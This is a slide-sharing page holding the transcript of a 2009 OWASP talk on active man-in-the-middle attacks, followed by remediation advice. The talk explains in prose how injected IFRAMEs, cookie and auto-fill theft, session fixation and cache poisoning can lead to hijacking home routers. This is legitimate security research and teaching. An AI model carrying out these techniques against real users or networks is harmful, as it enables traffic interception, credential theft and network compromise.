Active Man in the Middle Attacks

Slides:

Advertisements

Similar presentations

Transfer Content to a Website What is FTP? File Transfer Protocol FTP is a protocol – a set of rules Designed to allow files to be transferred across.

Advertisements

Enabling Secure Internet Access with ISA Server

© 2009 IBM Corporation IBM Rational Application Security The Bank Job Utilizing XSS Vulnerabilities Adi Sharabani IBM Rational Application Security Research.

ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.

ARP Cache Poisoning How the outdated Address Resolution Protocol can be easily abused to carry out a Man In The Middle attack across an entire network.

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

Session Hijacking Why web security depends on communications security and how TLS everywhere is the only solution. Scott Helme - 6th Aug scotthel.me.

1 Web Servers / Deployment Alastair Dawes Original by Bhupinder Reehal.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.

DSL-2870B How to Change ADSL Username and Password in your modem router How to Change Wireless Channel in your modem router How to Open Ports in your modem.

Security Issues and Challenges in Cloud Computing

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

Security Awareness: Applying Practical Security in Your World, Second Edition Chapter 5 Network Security.

Man in the Middle Paul Box Beatrice Wilds Will Lefevers.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

Cookies COEN 351 E-commerce Security. Client / Session Identification HTTP does not maintain state. State Information can be passed using: HTTP Headers.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

11 SUPPORTING INTERNET EXPLORER IN WINDOWS XP Chapter 11.

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Evolving Threats. Application Security - Understanding the Problem DesktopTransportNetworkWeb Applications Antivirus Protection Encryption (SSL) Firewalls.

Session Hijacking & ARP Poisoning Why web security depends on communications security and how TLS everywhere is the only solution.

HTML5 Group 3: Dongyang Zhang, Wei Liu, Weizhou He, Yutong Wei, Yuxin Zhu.

Session 11: Security with ASP.NET

WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.

1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.

Csci5233 Computer Security1 Bishop: Chapter 27 System Security.

Implementing ISA Server Publishing. Introduction What Are Web Publishing Rules? ISA Server uses Web publishing rules to make Web sites on protected networks.

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 1 Active Man in the Middle Attacks The.

© FPT SOFTWARE – TRAINING MATERIAL – Internal use 04e-BM/NS/HDCV/FSOFT v2/3 Securing a Microsoft ASP.NET Web Application.

Security at NCAR David Mitchell February 20th, 2007.

Drive-by pharming is an interesting type of networking attack that combines multiple networking vulnerabilities and average user laziness to create an.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Web Applications Testing By Jamie Rougvie Supported by.

Electronic Security Initiative 2005 Security Assessment & Security Services 23 August 2005.

Saphe surfing! 1 SAPHE Secure Anti-Phishing Environment Presented by Uri Sternfeld.

MEMBERSHIP AND IDENTITY Active server pages (ASP.NET) 1 Chapter-4.

Cookies COEN 351 E-commerce Security. Client / Session Identification HTTP Headers Client IP Address HTTP User Login FAT URLs Cookies.

TCP/IP Model & How it Relates to Browsing the Internet Anonymously BY: HELEN LIN.

Mohammed F & Aya. Peer-to-peer network are usually common in homes and small businesses and are not necessarily expensive. On a peer-to-peer network each.

ITGS Network Architecture. ITGS Network architecture –The way computers are logically organized on a network, and the role each takes. Client/server network.

Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.

CSRF Attacks Daniel Chen 11/18/15. What is CSRF?  Cross Site Request Forgery (Sea-Surf)  AKA XSRF/ One Click / Sidejacking / Session Riding  Exploits.

1 Utkarsha MishraCOMPSCI 725 David Silver, Suman Jana, Eric Chen, Collin Jackson, and Dan Boneh. “Password Managers: Attacks and Defenses.” In Proceedings.

SSH. 2 SSH – Secure Shell SSH is a cryptographic protocol – Implemented in software originally for remote login applications – One most popular software.

Do not try any of the techniques discussed in this presentation on a system you do not own. It is illegal and you will get caught.

Page 1 Ethical Hacking by Douglas Williams. Page 2 Intro Attackers can potentially use many different paths through your application to do harm to your.

IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 1 Active Man in the Middle Attacks The.

ArcGIS for Server Security: Advanced

Chapter 5 Electronic Commerce | Security Threats - Solution

Web Application Vulnerabilities

Web Application Vulnerabilities, Detection Mechanisms, and Defenses

World Wide Web policy.

Chapter 5 Electronic Commerce | Security Threats - Solution

OWASP CONSUMER TOP TEN SAFE WEB HABITS

Cross-Site Forgery

Introduction to Networking

Whether you decide to use hidden frames or XMLHttp, there are several things you'll need to consider when building an Ajax application. Expanding the role.

Man-in-the-Middle Attacks

Riding Someone Else’s Wave with CSRF

CSC 495/583 Topics of Software Security Intro to Web Security

Web Security Advanced Network Security Peter Reiher August, 2014

Firewalls Jiang Long Spring 2002.

Web Servers / Deployment

Unit 32 Every class minute counts! 2 assignments 3 tasks/assignment

Designing IIS Security (IIS – Internet Information Service)

Exploring DOM-Based Cross Site Attacks

Securing web applications Externally

Week 7 - Wednesday CS363.

Presentation transcript:

Active Man in the Middle Attacks Adi Sharabani Security Research Group Manager IBM Rational Application Security (a.k.a. Watchfire) adish OWASP 27/02/2009 The OWASP Foundation http://www.owasp.org

Agenda Background Outline Man in the Middle Network level – heavily researched Web application level – sporadic research Outline Passive MitM attacks Active MitM attacks Penetrating an internal network Remediation

Man in the Middle Scenario All laptop users connect to a public network Wireless connection can easily be compromised or impersonated Wired connections might also be compromised Internet

Rules of Thumb – Don’ts … Someone might be listening to the requests Don’t browse sensitive sites Don’t supply sensitive information Someone might be altering the responses Don’t trust any information given on web sites Don’t execute downloaded code

Rules of Thumb – What Can You Do? This leaves us with: Browse your favorite news site Browse your favorite weather site Internet Non-sensitive sites Boring Sensitive sites Interesting

You are still vulnerable

Mitigating a Fallacy Fallacy Reality Executing JavaScript on victim == executing an attack Reality Same origin policy Executing an attack JavaScript + browser implementation bug JavaScript + execution on a specific domain Can be done through XSS

Passive Man in the Middle Attacks Victim browses to a website Attacker views the response manipulates it and forwards to victim Attacker views the request manipulates it and forwards to server Server returns a response Other servers are not affected

Active Man in the Middle Attack Victim browses to a “boring” site Attacker adds an IFRAME referencing an “interesting” site Attack transfers the request to the server Server returns a response The attacker actively directs the victim to an “interesting” site The IFrame could be invisible My Weather Channel Other servers are not affected My Bank Site My Bank Site Automatic request sent to the interesting server

Automatic request contains victim’s cookies Stealing Cookies* Obvious result Stealing cookies associated with any domain attacker desires Will also work for HTTP ONLY cookies (as opposed to XSS attacks) Automatic request contains victim’s cookies * A similar attack was presented by Mike Perry – SideJacking

Demo

Overcoming Same Origin Policy Result Attacker can execute scripts on any domain she desires Scripts can fully interact with any “interesting” website Limitations Will only work for non SSL web sites Victim surfs to a “boring” site Attacker injects an IFRAME directing to an “interesting” site Attacker forwards the automatic request to the “interesting” server Script executes with the “interesting” server’s restrictions Attacker adds a malicious script to the response Automatic request sent to the interesting server “Interesting” server returns a response

Secure Connections Login Mechanism

Secure Connections Hello John Smith, Username Password SUBMIT jsmith Login Successful Hello John Smith, Please Login Username Password SUBMIT Victim fills login details, and submits the form Pre-login action sent in clear text Attacker could alter the pre-login response to make the login request sent unencrypted jsmith ******** Victim browses to site http://www.webmail.site SUBMIT Login request is sent through a secure channel Site returns a response with login form

Stealing Auto Completion Information Result Attacker can steal any auto-completion information she desires Limitations Will only work for pre-login pages not encrypted Will not work seamlessly in IE Attacker returns the original login form together with a malicious script Attacker redirect victim to a request to a pre-login page Script accesses the auto-completion information using the DOM * A passive version of this attack was described by RSnake in his blog

Demo

Broadening the Attack (Time Dimension)

Past Present Future Active MitM Attacks Passive MitM Attacks (“interesting” sites) Present (“boring” sites) Future (“interesting” sites)

Session Fixation Result Limitations Attacker can set persistent cookies on victim Limitations The vulnerability also lies within the server Server authenticates attacker as victim A while later, victim connects to the site (with the pre-provided cookie) Attacker returns a page with a cookie generated by server Attacker redirects victim to the site of interest Cookie is being saved on victim’s computer Attacker uses the same cookie to connect to the server

Cache Poisoning Result Limitations Attacker can poison any page she desires Poisoned pages will be persistent Limitations Attacker can poison non SSL resources A while later, victim visits the site Attacker redirects victim to the site of interest Attacker returns a malicious page with cache setting enabled Page is being cached on victim’s computer

Complex Hacking Intranet Networks

Penetrating Internal Network – Simple Cache Poison Result Attack will be launched every time victim accesses the resource The attack would executed within the local intranet Characteristics Firewall protections are helpless Affected servers will never know The attack is persistent

Setting Up a Future MitM Scenario Result Facilitates future MitM scenarios Does not require router’s credentials Fake settings could be displayed to the user Limitations Requires victim to access router in the future Need to guess router’s address (10.0.1.1) Script hides the configuration changes Using Active MitM Techniques, attacker poisons victim’s cache related to his router’s web access Malicious script executed when victim tries to access router Script configures router to tunnel future communication through attacker Router Victim’s router related cache poisoned with a malicious script Outbound Proxy IP Address 216 187 118 221 . Primary DNS Server Address 216 187 118 221 .

Increasing the Exposure Poison common home pages Script will execute every time victim opens his browser Poison common scripts Script will execute on every page using the common script Example: http://www.google-analytics.com/ga.js The “double active” attack Common poisoned page redirects to another poisoned resource .JS

The Double Active Cache Poisoning Attack Result Internal network has been compromised Limitation Need to guess router IP and credentials At a later time, Victim opens browser Cached router’s web interface is loaded and malicious script changes router’s settings Cached home page is loaded and redirects victim’s browser to router’s web interface Using Active MitM techniques, attacker poisons common router’s address (i.e. 10.0.1.1) Router Victim browses “boring” site Using active techniques, attacker poisons two resources: Poison local router address (such as 10.0.1.1): The poisoned page will contain script that will reconfigure victim’s local router Poison common pages (such as www.google.com): The poisoned pages will redirect the victim to the local router’s poisoned page Victim goes back home Opens a common page Redirects to local router Running script on router Script configures routers to tunnel all further communication through attacker Attacker also poisons common home pages Router is compromised by malicious script

Active Attack Characteristics Not noticeable in user’s experience Not noticeable by any of the web sites IPS/IDS will not block it Can be persistent Can be used to hack into local organization Bypasses any firewall or VPN Can be used with DNS Pinning Techniques A problem with the current design Requires only one plain HTTP request to be transmitted

Remediation Users Do not use auto-completion “Clean Slate Policy” Trust level separation Two different browsers Two different users Two different OS Virtualization products Tunnel communication through a secure proxy Might not be allowed in many hot-spots

Web owners Consider risks of partial SSL sites Do not consider secure VPN connection as an SSL replacement Use random tokens for common scripts While considering performance issues Avoid referring external scripts from internal sites

Industry Build integrity mechanism for HTTP Secure WiFi networks

Summary Active MitM attacks– broaden the scope of the passive attacks Design issues Dimension of time Past (steal cookies, auto-completion information, cache) Future (set up cookies, poison cache, poison form filler) Penetrating internal networks Persistent Bypass any current protection mechanisms More information: Paper and presentation will be uploaded to our blog: http://blog.watchfire.com

References Watchfire’s Blog: http://blog.watchfire.com Wireless Man in the Middle Attacks: http://www.informit.com/articles/article.aspx?p=353735&seqNum=7 SideJacking: http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html More on SideJacking: http://erratasec.blogspot.com/2008/01/more-sidejacking.html Active SideJacking: http://seclists.org/bugtraq/2007/Aug/0070.html Surf Jacking http://resources.enablesecurity.com/resources/Surf%20Jacking.pdf Stealing User Information: http://ha.ckers.org/blog/20060821/stealing-user-information-via-automatic-form-filling/

Thank you!